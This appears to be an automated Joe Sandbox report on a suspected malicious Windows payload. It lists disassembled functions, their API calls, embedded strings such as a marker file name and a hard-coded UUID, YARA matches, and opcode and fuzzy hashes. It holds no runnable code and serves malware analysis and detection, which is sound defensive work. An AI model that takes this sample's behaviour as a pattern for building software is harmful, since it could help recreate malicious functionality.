                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3567560977-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 00E5594A
                                                                                                                              • Part of subcall function 00E58AF7: __mtinitlocknum.LIBCMT ref: 00E58B09
                                                                                                                              • Part of subcall function 00E58AF7: __amsg_exit.LIBCMT ref: 00E58B15
                                                                                                                              • Part of subcall function 00E58AF7: EnterCriticalSection.KERNEL32(?,?,00E550D7,0000000D), ref: 00E58B22
                                                                                                                            • _free.LIBCMT ref: 00E55970
                                                                                                                              • Part of subcall function 00E50BED: HeapFree.KERNEL32(00000000,00000000,?,00E5507F,00000000,00E5500D,?,00E53F7C,?,00E4E6CC,00000000), ref: 00E50C01
                                                                                                                              • Part of subcall function 00E50BED: GetLastError.KERNEL32(00000000,?,00E5507F,00000000,00E5500D,?,00E53F7C,?,00E4E6CC,00000000,?,?,?,?,?,00EFB3EC), ref: 00E50C13
                                                                                                                            • __lock.LIBCMT ref: 00E55989
                                                                                                                            • ___removelocaleref.LIBCMT ref: 00E55998
                                                                                                                            • ___freetlocinfo.LIBCMT ref: 00E559B1
                                                                                                                            • _free.LIBCMT ref: 00E559C4
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 626533743-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: $+$0123456789ABCDEF$Ul
                                                                                                                            • API String ID: 1302938615-2110468602
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 00E807C3
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                                            • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                                            • API String ID: 601868998-2416195885
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00E6B70B
                                                                                                                              • Part of subcall function 00E50C62: __FF_MSGBANNER.LIBCMT ref: 00E50C79
                                                                                                                              • Part of subcall function 00E50C62: __NMSG_WRITE.LIBCMT ref: 00E50C80
                                                                                                                              • Part of subcall function 00E50C62: RtlAllocateHeap.NTDLL(012D0000,00000000,00000001,00000000,00000000,00000000,?,00E58CF4,00000000,00000000,00000000,00000000,?,00E58BE1,00000018,00F37BD0), ref: 00E50CA5
                                                                                                                            • _free.LIBCMT ref: 00E6B71E
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1020059152-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00E4F085
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4F0AC
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00E4F0B6
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4F0C4
                                                                                                                            • WaitForSingleObject.KERNEL32(0000000A), ref: 00E4F0D2
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            • Opcode ID: a5813a21410a4104a408fcdc553dfb359931b2111eabf880818c68c90d91a9af
                                                                                                                            • Instruction ID: 661fe631a88097d6b97545417c2cd34e5f93b0f3edcf3993be594c2a827c3ef1
                                                                                                                            • Opcode Fuzzy Hash: a5813a21410a4104a408fcdc553dfb359931b2111eabf880818c68c90d91a9af
                                                                                                                            • Instruction Fuzzy Hash: B501D635A4131D7AEB309B55EC4AFA63BACEB94B04F204011FE00BB1D1D7F5A909DBA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00E4E515
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4E53C
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00E4E546
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4E554
                                                                                                                            • WaitForSingleObject.KERNEL32(0000000A), ref: 00E4E562
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            • Opcode ID: 9657ccf07bcf719369b45ab53dda355bfad423ad894c3e6383a306cfdb1b1fca
                                                                                                                            • Instruction ID: 93f1a1830850e2b934b0a57edb89352072d8fbc8a8b9b07c06adad945172c19e
                                                                                                                            • Opcode Fuzzy Hash: 9657ccf07bcf719369b45ab53dda355bfad423ad894c3e6383a306cfdb1b1fca
                                                                                                                            • Instruction Fuzzy Hash: 5201F73574030D7BF6209B51ED46FA67B6CA784B08F300411FA00BA1D1D6F5A609C790
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 00E4FA53
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4FA71
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00E4FA7B
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4FA89
                                                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 00E4FA94
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            • Opcode ID: d2b4ecc5fb4f5ec96604c53a5afab19510955f25e3ad9e4e41b806fd17450261
                                                                                                                            • Instruction ID: d707e454045b1e455f3c70c887402aaade39795571d40c1d2963c143642954c1
                                                                                                                            • Opcode Fuzzy Hash: d2b4ecc5fb4f5ec96604c53a5afab19510955f25e3ad9e4e41b806fd17450261
                                                                                                                            • Instruction Fuzzy Hash: F8018631B41309BBEB209B55DD4AFA63BACAB84B44F644061FA04BE1D1D7E5A805C6A0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: 6ea1777919e243330e70ac901f5ca9ea49d4a3c6aef3400a0416be5e365ea00e
                                                                                                                            • Instruction ID: d8331d93eec06a03e2c0e561de6004c817d56fdba511ba243f3100d70f9e570e
                                                                                                                            • Opcode Fuzzy Hash: 6ea1777919e243330e70ac901f5ca9ea49d4a3c6aef3400a0416be5e365ea00e
                                                                                                                            • Instruction Fuzzy Hash: B351C4317081059BDB24CE1CEC80A6AB7A6EF88714B24992DF8D5E7741DB31DD54CBD0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __flsbuf__flush__getptd_noexit__write
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3115901604-2740779761
                                                                                                                            • Opcode ID: c801ac2ca2d43139865efb7dfbd9e243acdf2f1ae776db3811a370f6b9bcd5c2
                                                                                                                            • Instruction ID: cea1dfc3e347b3d977f62a820d74a62a10857e7cf0ab6cae71699d4f9bf244c9
                                                                                                                            • Opcode Fuzzy Hash: c801ac2ca2d43139865efb7dfbd9e243acdf2f1ae776db3811a370f6b9bcd5c2
                                                                                                                            • Instruction Fuzzy Hash: EA41F6307007069FDB388EA9C8805AE77A5FF86366F149A2DEE15E7242D770DD898B50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: 47ce69d487dd2ab384bcba71184936ee3aec3a446cba281ef14402d8cc8ef6a9
                                                                                                                            • Instruction ID: 8b9f74ecd00423238aa6119fd0e267248bc2be4ba016cfa3924f9eb822dd2b1e
                                                                                                                            • Opcode Fuzzy Hash: 47ce69d487dd2ab384bcba71184936ee3aec3a446cba281ef14402d8cc8ef6a9
                                                                                                                            • Instruction Fuzzy Hash: 2C3108B13002049BDB28DE5CEC81E6A73B6EF807147605A1CF865EB3D5D771ED408B98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • UuidCreate.RPCRT4(?), ref: 00E3C5DA
                                                                                                                            • UuidToStringA.RPCRT4(?,00000000), ref: 00E3C5F6
                                                                                                                            • RpcStringFreeA.RPCRT4(00000000), ref: 00E3C640
                                                                                                                            Strings
                                                                                                                            • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 00E3C687
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: StringUuid$CreateFree
                                                                                                                            • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                                            • API String ID: 3044360575-2335240114
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E3C48B
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E3C4A9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendFolder
                                                                                                                            • String ID: bowsakkdestx.txt
                                                                                                                            • API String ID: 29327785-2616962270
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00E4BA4A
                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 00E4BA73
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassCursorLoadRegister
                                                                                                                            • String ID: 0$LPCWSTRszWindowClass
                                                                                                                            • API String ID: 1693014935-1496217519
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E3C438
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E3C44E
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00E3C45B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendDeleteFileFolder
                                                                                                                            • String ID: bowsakkdestx.txt
                                                                                                                            • API String ID: 610490371-2616962270
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove_strtok
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3446180046-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2974526305-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E6C6AD
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 00E6C6DB
                                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,00E6C0ED,?,00BFBBEF,00000003), ref: 00E6C709
                                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,00E6C0ED,?,00BFBBEF,00000003), ref: 00E6C73F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • ___BuildCatchObject.LIBCMT ref: 00EF70AB
                                                                                                                              • Part of subcall function 00EF77A0: ___BuildCatchObjectHelper.LIBCMT ref: 00EF77D2
                                                                                                                              • Part of subcall function 00EF77A0: ___AdjustPointer.LIBCMT ref: 00EF77E9
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00EF70C2
                                                                                                                            • ___FrameUnwindToState.LIBCMT ref: 00EF70D4
                                                                                                                            • CallCatchBlock.LIBCMT ref: 00EF70F8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2901542994-0
                                                                                                                            • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                            • Instruction ID: 1f8d47ccf88753da1b647e3c42ab799b5e8abce8efcbed517cd90294251484f9
                                                                                                                            • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                            • Instruction Fuzzy Hash: B801133200010DBBCF12AF55CC01EEA3FAAEF48718F149014FA9872121D732E961EBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00E55007: __getptd_noexit.LIBCMT ref: 00E55008
                                                                                                                              • Part of subcall function 00E55007: __amsg_exit.LIBCMT ref: 00E55015
                                                                                                                            • __calloc_crt.LIBCMT ref: 00E55A01
                                                                                                                              • Part of subcall function 00E58C96: __calloc_impl.LIBCMT ref: 00E58CA5
                                                                                                                            • __lock.LIBCMT ref: 00E55A37
                                                                                                                            • ___addlocaleref.LIBCMT ref: 00E55A43
                                                                                                                            • __lock.LIBCMT ref: 00E55A57
                                                                                                                              • Part of subcall function 00E55208: __getptd_noexit.LIBCMT ref: 00E55208
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2580527540-0
                                                                                                                            • Opcode ID: 2e21aa3e40a195477c8dec02bf48a739d14df13bbeb5e32e85dcaaf51e98f81e
                                                                                                                            • Instruction ID: 43f151c28b667959ac4e6ec25e52efd1c263fd040d035dad1afdd0acccda820c
                                                                                                                            • Opcode Fuzzy Hash: 2e21aa3e40a195477c8dec02bf48a739d14df13bbeb5e32e85dcaaf51e98f81e
                                                                                                                            • Instruction Fuzzy Hash: E4019E72541700DBD720FFA88543B5DB7E0AF80722F206A49FC65BB2D2DE744D488A61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                            • Instruction ID: 8c420089ed74650a106d780bbfe8dd397c6de8ff5ecf8ebc769434afc57a1490
                                                                                                                            • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                            • Instruction Fuzzy Hash: EF014B3240028EFFCF125E84DC428EE3F66BB69354F58D455FA5D68031D236C9B2AB81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32 ref: 00E427B9
                                                                                                                            • _malloc.LIBCMT ref: 00E427C3
                                                                                                                              • Part of subcall function 00E50C62: __FF_MSGBANNER.LIBCMT ref: 00E50C79
                                                                                                                              • Part of subcall function 00E50C62: __NMSG_WRITE.LIBCMT ref: 00E50C80
                                                                                                                              • Part of subcall function 00E50C62: RtlAllocateHeap.NTDLL(012D0000,00000000,00000001,00000000,00000000,00000000,?,00E58CF4,00000000,00000000,00000000,00000000,?,00E58BE1,00000018,00F37BD0), ref: 00E50CA5
                                                                                                                            • _memset.LIBCMT ref: 00E427CE
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 00E427E4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2824100046-0
                                                                                                                            • Opcode ID: 7154eb7ae52b99cd7e9181f3eea5d49d4f3bffb3ae209a6865e5470f01039181
                                                                                                                            • Instruction ID: 9b5570e2e7d879f8b42f2881251b08e778912d6e2f3b7a2e6bb1861043611027
                                                                                                                            • Opcode Fuzzy Hash: 7154eb7ae52b99cd7e9181f3eea5d49d4f3bffb3ae209a6865e5470f01039181
                                                                                                                            • Instruction Fuzzy Hash: 86F02735701208BFE72056699C4AFBBB6DDDBC6761F200125BA04F32C1E9512D0992F5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • lstrlenA.KERNEL32 ref: 00E42806
                                                                                                                            • _malloc.LIBCMT ref: 00E42814
                                                                                                                              • Part of subcall function 00E50C62: __FF_MSGBANNER.LIBCMT ref: 00E50C79
                                                                                                                              • Part of subcall function 00E50C62: __NMSG_WRITE.LIBCMT ref: 00E50C80
                                                                                                                              • Part of subcall function 00E50C62: RtlAllocateHeap.NTDLL(012D0000,00000000,00000001,00000000,00000000,00000000,?,00E58CF4,00000000,00000000,00000000,00000000,?,00E58BE1,00000018,00F37BD0), ref: 00E50CA5
                                                                                                                            • _memset.LIBCMT ref: 00E4281F
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00E42832
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2824100046-0
                                                                                                                            • Opcode ID: 73fdd3aa507110dfaf392e61fd80edf870cdae01428511b6db4485ee02a32e89
                                                                                                                            • Instruction ID: 3ccee790633c4541366b591cd84d58dfaaf01fef7e9a1f1560cb8093e13d5d07
                                                                                                                            • Opcode Fuzzy Hash: 73fdd3aa507110dfaf392e61fd80edf870cdae01428511b6db4485ee02a32e89
                                                                                                                            • Instruction Fuzzy Hash: 9DE086763011287BE510235A6C4AFBB665CCBC27A6F200551FA12F22D29A901C0AC1B0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: 68b84bbf87bbb26803e5114426a4e0b81488b3d708a8cbc4d3a9cd0df3492636
                                                                                                                            • Instruction ID: 41fdb717d1ea11dd473032a53073de67f98db8bc71ee3fc80410fc466b886e96
                                                                                                                            • Opcode Fuzzy Hash: 68b84bbf87bbb26803e5114426a4e0b81488b3d708a8cbc4d3a9cd0df3492636
                                                                                                                            • Instruction Fuzzy Hash: FEC16FB0700109DBCB24CF4CE8C5AAAB3B6FF84304B24552DE846EB695EB30ED55DB95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: .\crypto\asn1\tasn_new.c
                                                                                                                            • API String ID: 2102423945-2878120539
                                                                                                                            • Opcode ID: 9feb4319ce8251f24fbf612603f3f0efed9b9eac51faaf44963f5853e0f38f5e
                                                                                                                            • Instruction ID: 72a91759f46d48b270eb01def84e8a6532c33b641ffe952408ef3ca0588ec815
                                                                                                                            • Opcode Fuzzy Hash: 9feb4319ce8251f24fbf612603f3f0efed9b9eac51faaf44963f5853e0f38f5e
                                                                                                                            • Instruction Fuzzy Hash: EB51E67174030667E7306EA6ACC2F7777D8DF5AB94F041829F918F9182EAA5F8049272
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00EB0686
                                                                                                                              • Part of subcall function 00E84C00: _raise.LIBCMT ref: 00E84C18
                                                                                                                            Strings
                                                                                                                            • .\crypto\evp\digest.c, xrefs: 00EB0638
                                                                                                                            • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 00EB062E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset_raise
                                                                                                                            • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                            • API String ID: 1484197835-3867593797
                                                                                                                            • Opcode ID: 99cc5e32826e8e2ef3004e1ae206cfb0663137a8734b60a56e2ce62ac94c944f
                                                                                                                            • Instruction ID: 4f503ce82f269703ad4f7360f7eaf41db37eaddc5dc655e780335fa88fe15584
                                                                                                                            • Opcode Fuzzy Hash: 99cc5e32826e8e2ef3004e1ae206cfb0663137a8734b60a56e2ce62ac94c944f
                                                                                                                            • Instruction Fuzzy Hash: 25018B75600200AFC311DF08EC42E5AB7E5AFC8304F194428F588EB262E761EC558B95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%